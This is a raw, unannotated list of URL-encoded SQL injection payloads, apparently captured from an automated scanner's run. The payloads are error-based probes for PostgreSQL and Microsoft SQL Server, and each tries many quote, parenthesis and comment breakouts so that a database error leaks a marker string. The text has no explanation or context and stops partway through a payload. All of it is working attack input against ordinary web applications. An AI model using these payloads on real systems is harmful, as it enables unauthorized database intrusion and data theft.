1%22%20WHERE%207277%3D7277%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 1%27%7C%7C%28SELECT%20%27ehbI%27%20FROM%20DUAL%20WHERE%205632%3D5632%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27mniG%27%20WHERE%205806%3D5806%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%29%7C%7C%27 1%27%2B%28SELECT%20JYJW%20WHERE%204112%3D4112%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%29%2B%27 1%27%2B%28SELECT%20%27Vmjj%27%20WHERE%205267%3D5267%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%23 1%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%287765%3D7765 1%29%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%281295%3D1295 1%29%29%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%289980%3D9980 1%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1%29%20WHERE%203018%3D3018%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1%20WHERE%208315%3D8315%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1%27%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1%27%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1%22%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1%27%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27cqQr%27%3D%27cqQr 1%27%29%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27sMmF%27%3D%27sMmF 1%27%29%29%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27mafI%27%3D%27mafI 1%27%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27raQI%27%3D%27raQI 1%27%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27vjKB%27%20LIKE%20%27vjKB 1%27%29%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27pHQo%27%20LIKE%20%27pHQo 1%27%29%29%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27razH%27%20LIKE%20%27razH 1%27%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27CwtA%27%20LIKE%20%27CwtA 1%22%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22udTw%22%3D%22udTw 1%22%29%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22KWDA%22%3D%22KWDA 1%22%29%29%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22jUPI%22%3D%22jUPI 1%22%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22tGCB%22%3D%22tGCB 1%22%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22ekcY%22%20LIKE%20%22ekcY 1%22%29%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22IjBE%22%20LIKE%20%22IjBE 1%22%29%29%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22oguU%22%20LIKE%20%22oguU 1%22%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22dwTC%22%20LIKE%20%22dwTC 1%25%27%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27BcQG%27%3D%27BcQG 1%00%27%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27mlrY%27%3D%27mlrY 1%27%29%20WHERE%205784%3D5784%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1%22%29%20WHERE%206219%3D6219%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1%27%20WHERE%206497%3D6497%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1%22%20WHERE%203922%3D3922%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1%27%7C%7C%28SELECT%20%27MUMp%27%20FROM%20DUAL%20WHERE%209467%3D9467%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27yngV%27%20WHERE%206654%3D6654%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%7C%7C%27 1%27%2B%28SELECT%20rWsX%20WHERE%207968%3D7968%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%2B%27 1%27%2B%28SELECT%20%27IEWr%27%20WHERE%202838%3D2838%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%209745%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%23 1%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%284672%3D4672 1%29%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%282862%3D2862 1%29%29%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%287772%3D7772 1%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1%29%20WHERE%206801%3D6801%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1%20WHERE%209743%3D9743%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1%27%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1%27%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1%22%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1%27%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27tDIg%27%3D%27tDIg 1%27%29%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27SJTD%27%3D%27SJTD 1%27%29%29%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27dZci%27%3D%27dZci 